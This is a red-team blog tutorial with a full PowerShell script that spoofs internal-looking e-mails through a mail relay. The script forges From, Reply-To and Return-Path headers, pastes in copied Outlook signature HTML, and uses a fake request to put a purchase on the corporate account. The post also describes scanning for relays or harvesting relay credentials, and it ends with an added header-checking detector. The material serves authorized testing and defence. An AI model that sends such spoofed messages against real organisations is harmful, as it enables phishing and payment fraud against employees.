Introduction

If you’re like me, you’ll recall the days of using telnet to connect to an SMTP server on port 25 and issuing the basic SMTP commands [1] (e.g. EHLO, MAIL FROM:, RCPT TO:, DATA). While I won’t miss accidentally mistyping a command, I will miss the simplicity. That simplicity came with limitations, though, such as crafting a realistic e-mail that looks identical to an internal communication. Enter PowerShell: nothing new or groundbreaking, but it makes things both easy and realistic. In this post, I’ll pull together everything I’ve learned and demonstrate how to use PowerShell to turn a mail relay into a Blue Team’s nightmare or a Red Team’s best friend.

Please note - the config and script below are fictitious and will not work if you try to run the PowerShell as-is. Additionally, ThickMints.dev has no association with Girl Scouts. Do not attempt this on systems that you don’t own or have explicit permission to test.

Setup

The setup is simple: you’ll need 3 (or 4, for some extra flair) things to make this successful.

  1. Mail Relay (doesn’t have to be open)
  2. A sample e-mail that you want to copy
  3. PowerShell
  4. Bonus Item: Corporate Logo or similar graphic to embed in the email

In addition, you’ll need minimal experience reading and editing HTML and PowerShell.

Making It All Happen

Mail Relay

The first thing you need is a mail relay server. The PowerShell provided in this post includes a means to authenticate, so if you are unable to find an open mail relay on the network, this won’t be a problem. There are many ways to find a mail relay server; for example, you may find scripts that contain UN/PW combinations for a mail relay while performing reconnaissance on a network, or you can scan a network for an open TCP port 25 (you could even add TCP ports 465 and 587).

Sample E-mail

This is the most important part of making a realistic spoofed message. Acquire a copy of the e-mail that you want to mimic and view the raw message HTML. There are many ways to view the HTML, but a quick web search brought me here: View Original Message HTML, which accounts for various scenarios. You will need this raw HTML for the PowerShell script.

PowerShell Script

Disclaimer: the provided PowerShell script is basic, but it gets the job done.

I have broken my PowerShell script into four main sections.

Section 1 - Variables

The first section holds the variables that make tweaking and changing messages quick and easy. These variables cover the contents of the message itself and are used in the E-mail Message section. In addition, you can make the “reply” e-mail address different from the “from” e-mail address.

$MailFrom = "Thin Mints <ThinMints@thickmints.dev>"
$MailTo = "CarmelDeLites@thickmints.dev"
$MailCC = "Lemonades@thickmints.dev,Smores@thickmints.dev" # Comma-separated list, no trailing comma (it would fail address parsing)
$ReplyTo = "$MailTo" #Or set the reply to an email box you control
$ReturnPath = "$MailTo"
$MessageSubject = "Please Send a Crate of Girl Scout Cookies ASAP"
$MessageBody = "Carmel, please make sure to send a crate of Girl Scout cookies to the crew over at ThickMints.dev. Put it on the corporate account. Thanks."
$MessageSignature = "Thin"
$MessageName = "Thin Mints"
$MessageTitle = "Chief Cookie Officer"
$MessageAddress = "123 Cookie Way, Sugar City, NY 12345" 
$MessagePhone = "555-867-5309"
$MessageEmail = "ThinMints@thickmints.dev"
$MessageSensitivity = "Confidential"

Section 2 - SMTP Server Config

This section establishes all of the SMTP server config. If you require a UN/PW for the mail relay, include the first 3 lines. If you’ve found an open mail relay, you can ignore them.

$Username = "anonymous"
$Secret = ConvertTo-SecureString -String "password" -AsPlainText -Force
$Creds = New-Object System.Management.Automation.PSCredential($Username,$Secret)
$SmtpServer = "mail.thickmints.dev"
$SmtpPort = "25"

Section 3 - E-mail Message

Here’s where it gets fun. This section builds the e-mail message that will be sent. Take the raw message HTML from your sample e-mail and put it in the $Message.Body variable. If you have images that you’d like to include, attach them here. When attaching items, make sure that the user context from which you are executing the PowerShell has access to that path.

$Message = New-Object System.Net.Mail.MailMessage $MailFrom,$MailTo
# Optional: Here's where to attach images 
$Message.Attachments.Add("C:\Temp\MailSpoof\CompanyLogo.png")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award1.png")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award2.jpg")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award3.png")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award4.jpg")
$Message.Headers.Add("Return-Path",$ReturnPath)
$Message.CC.Add($MailCC)
$Message.ReplyTo=$ReplyTo
$Message.IsBodyHTML = $true
$Message.Subject = $MessageSubject
$Message.Body = @"
<html>
RAW HTML HERE
</html>
"@

Section 4 - Sending Message

Finally, we need PowerShell to send the message we just crafted. If your mail relay requires TLS/SSL and credentials, you’ll see a couple of lines to account for that. Remember, if using credentials, set the UN/PW in the SMTP Server Config section.

$Smtp = New-Object Net.Mail.SmtpClient($SmtpServer,$SmtpPort)
$Smtp.EnableSsl = $true
$Smtp.Credentials = $Creds
$Smtp.Send($Message)

Putting It All Together

Here is an example PowerShell script that brings everything together. The raw HTML came from a message generated with Microsoft Outlook, with a signature block that mimics a corporate environment.

# SECTION 1 - VARIABLES
$MailFrom = "Thin Mints <ThinMints@thickmints.dev>"
$MailTo = "CarmelDeLites@thickmints.dev"
$MailCC = "Lemonades@thickmints.dev,Smores@thickmints.dev" # Comma-separated list, no trailing comma (it would fail address parsing)
$ReplyTo = "$MailTo" #Or set the reply to an email box you control
$ReturnPath = "$MailTo"
$MessageSubject = "Please Send a Crate of Girl Scout Cookies ASAP"
$MessageBody = "Carmel, please make sure to send a crate of Girl Scout cookies to the crew over at ThickMints.dev. Put it on the corporate account. Thanks."
$MessageSignature = "Thin"
$MessageName = "Thin Mints"
$MessageTitle = "Chief Cookie Officer"
$MessageAddress = "123 Cookie Way, Sugar City, NY 12345" 
$MessagePhone = "555-867-5309"
$MessageEmail = "ThinMints@thickmints.dev"
$MessageSensitivity = "Confidential"

# SECTION 2 - SMTP SERVER CONFIG
$Username = "user"
$Secret = ConvertTo-SecureString -String "password" -AsPlainText -Force
$Creds = New-Object System.Management.Automation.PSCredential($Username,$Secret)
$SmtpServer = "mail.thickmints.dev"
$SmtpPort = "25"

# SECTION 3 - BUILD E-MAIL MESSAGE
$Message = New-Object System.Net.Mail.MailMessage $MailFrom,$MailTo
# Optional: Here's where to attach images 
$Message.Attachments.Add("C:\Temp\MailSpoof\CompanyLogo.png")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award1.png")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award2.jpg")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award3.png")
$Message.Attachments.Add("C:\Temp\MailSpoof\Award4.jpg")
$Message.Headers.Add("Return-Path",$ReturnPath)
$Message.CC.Add($MailCC)
$Message.ReplyTo=$ReplyTo
$Message.IsBodyHTML = $true
$Message.Subject = $MessageSubject
$Message.Body = @"
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40">
  <head>
    <meta http-equiv=Content-Type content="text/html; charset=us-ascii">
    <meta name=Generator content="Microsoft Word 15 (filtered medium)">
    <!--[if !mso]>
				<style>v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
				<![endif]-->
    <style>
      <!--
      /* Font Definitions */
      @font-face {
        font-family: "Cambria Math";
        panose-1: 2 4 5 3 5 4 6 3 2 4;
      }

      @font-face {
        font-family: Calibri;
        panose-1: 2 15 5 2 2 2 4 3 2 4;
      }

      /* Style Definitions */
      p.MsoNormal,
      li.MsoNormal,
      div.MsoNormal {
        margin: 0in;
        font-size: 11.0pt;
        font-family: "Calibri", sans-serif;
      }

      a:link,
      span.MsoHyperlink {
        mso-style-priority: 99;
        color: #0563C1;
        text-decoration: underline;
      }

      span.EmailStyle17 {
        mso-style-type: personal-compose;
        font-family: "Calibri", sans-serif;
        color: windowtext;
      }

      .MsoChpDefault {
        mso-style-type: export-only;
        font-family: "Calibri", sans-serif;
      }

      @page WordSection1 {
        size: 8.5in 11.0in;
        margin: 1.0in 1.0in 1.0in 1.0in;
      }

      div.WordSection1 {
        page: WordSection1;
      }
      -->
    </style>
    <!--[if gte mso 9]>
				<xml>
					<o:shapedefaults v:ext="edit" spidmax="1026" />
				</xml>
				<![endif]-->
    <!--[if gte mso 9]>
				<xml>
					<o:shapelayout v:ext="edit">
						<o:idmap v:ext="edit" data="1" />
					</o:shapelayout>
				</xml>
				<![endif]-->
  </head>
  <body lang=EN-US link="#0563C1" vlink="#954F72" style='word-wrap:break-word'>
    <p class=msipheader3e56b697 align="Right" style="margin:0">
	    <span style='font-size:10.0pt;font-family:Calibri;color:#000000'>$MessageSensitivity</span>
	</p>
	<br />
    <div class=WordSection1>
      <p class=MsoNormal>$MessageBody<o:p></o:p>
      </p>
      <p class=MsoNormal>
        <o:p>&nbsp;</o:p>
      </p>
      <p class=MsoNormal>$MessageSignature <o:p></o:p>
      </p>
      <p class=MsoNormal>
        <o:p>&nbsp;</o:p>
      </p>
      <p class=MsoNormal>-- <o:p></o:p>
      </p>
      <p class=MsoNormal>
        <o:p>&nbsp;</o:p>
      </p>
      <p class=MsoNormal>
        <b>
          <span style='font-size:12.0pt;color:#3EB489;mso-fareast-language:JA'>$MessageName<o:p></o:p>
          </span>
        </b>
      </p>
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>$MessageTitle<o:p></o:p>
        </span>
      </p>
      <!-- *****PLEASE NOTE - IMAGES MUST MATCH THE IMAGE FILENAME*****  -->
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>
          <img width=157 height=98 style='width:1.6354in;height:1.0208in' id="Picture_x0020_6" src="cid:CompanyLogo.png">
          <o:p></o:p>
        </span>
      </p>
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>$MessageAddress<o:p></o:p>
        </span>
      </p>
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>Mobile: $MessagePhone<o:p></o:p>
        </span>
      </p>
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>
          <a href="mailto:$MessageEmail">$MessageEmail</a> | <a href="https://blog.thickmints.dev/">blog.thickmints.dev</a>
          <o:p></o:p>
        </span>
      </p>
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>
          <o:p>&nbsp;</o:p>
        </span>
      </p>
      <!-- *****PLEASE NOTE - IMAGES MUST MATCH THE IMAGE FILENAMES*****  -->
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>
          <img border=0 width=132 height=129 style='width:1.375in;height:1.3437in' id="Picture_x0020_8" src="cid:Award1.png" alt="Girl Scout Badge 1">&nbsp; <img border=0 width=132 height=129 style='width:1.375in;height:1.3437in' id="Picture_x0020_7" src="cid:Award2.jpg" alt="Girl Scout Badge 2">&nbsp;&nbsp; <img border=0 width=132 height=129 style='width:1.375in;height:1.3437in' id="Picture_x0020_9" src="cid:Award3.jpg" alt="Girl Scout Badge 3">&nbsp;&nbsp; <img border=0 width=132 height=129 style='width:1.375in;height:1.3437in' id="Picture_x0020_10" src="cid:Award4.jpg" alt="Girl Scout Badge 4">
          <o:p></o:p>
        </span>
      </p>
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>Images and names are all copyrights of Girl Scouts of the United States of America. <o:p></o:p>
        </span>
      </p>
      <p class=MsoNormal>
        <span style='color:#333333;mso-fareast-language:JA'>&copy; 2016-2021 Girl Scouts of the United States of America. <o:p></o:p>
        </span>
      </p>
    </div>
  </body>
</html>
"@

# SECTION 4 - SENDING MESSAGE
$Smtp = New-Object Net.Mail.SmtpClient($SmtpServer,$SmtpPort)
$Smtp.EnableSsl = $true
$Smtp.Credentials = $Creds
$Smtp.Send($Message)
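From the defender’s side, the headers the script above sets are exactly what a mail gateway or SIEM can key on. The following checker is an added example, not part of the original post: it parses a constructed sample message shaped like the one the script hands to the relay and flags a Reply-To or Return-Path that does not match From, a Return-Path that points at a recipient, and an internal From address on mail that carries no Authentication-Results header. The internal domain (thickmints.dev) and the sample message are assumptions made for this example.

```python
from email import policy
from email.parser import BytesParser
from email.utils import getaddresses, parseaddr

INTERNAL_DOMAIN = "thickmints.dev"  # assumption: the domain the relay is meant to serve

# Constructed sample, shaped like what the script above hands to the relay:
# Reply-To pointed at an outside mailbox, Return-Path set to the recipient,
# and no Authentication-Results because the gateway never saw the message.
SAMPLE = b"""\
From: Thin Mints <ThinMints@thickmints.dev>
To: CarmelDeLites@thickmints.dev
Cc: Lemonades@thickmints.dev, Smores@thickmints.dev
Reply-To: thin.mints@outside.example
Return-Path: CarmelDeLites@thickmints.dev
Subject: Please Send a Crate of Girl Scout Cookies ASAP
Content-Type: text/html; charset=us-ascii

<html><body>Carmel, please send a crate of cookies.</body></html>
"""


def _addr(value):
    """Lower-cased address part of a single-address header ('' if absent)."""
    return parseaddr(value or "")[1].lower()


def spoof_indicators(raw, internal_domain=INTERNAL_DOMAIN):
    """Return the reasons a raw message looks like it was injected via a relay."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    sender = _addr(msg["From"])
    reply_to = _addr(msg["Reply-To"])
    return_path = _addr(msg["Return-Path"])
    recipients = {a.lower() for _, a in
                  getaddresses(msg.get_all("To", []) + msg.get_all("Cc", []))}
    reasons = []
    if reply_to and reply_to != sender:
        reasons.append(f"Reply-To {reply_to} differs from From {sender}")
    if return_path and return_path != sender:
        reasons.append(f"Return-Path {return_path} differs from From {sender}")
    if return_path and return_path in recipients:
        reasons.append("Return-Path is one of the recipients (bounces go to the target)")
    # Mail that really came from outside passes the gateway, which stamps
    # Authentication-Results; an internal From without it never went through it.
    if sender.endswith("@" + internal_domain) and "Authentication-Results" not in msg:
        reasons.append("internal From address but no Authentication-Results header")
    return reasons


if __name__ == "__main__":
    for reason in spoof_indicators(SAMPLE):
        print("indicator:", reason)
```

Treat the Return-Path checks as weak signals: the delivering MTA normally replaces any sender-supplied Return-Path with the envelope sender (RFC 5321, section 4.4), so the header in the stored copy may already differ from what the script set.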


Summary

Using this technique, you will be able to spoof e-mail messages that look identical to real internal communications. From a Red Team perspective, you can increase the efficacy of your internal phishing campaigns. On the flip side, I hope this stresses the importance of securing your mail relay servers to avoid falling victim to this attack. PowerShell is widely available on most corporate networks, and the barrier to entry for performing these actions is low. Stay minty.


[1] RFC 2821 - Simple Mail Transfer Protocol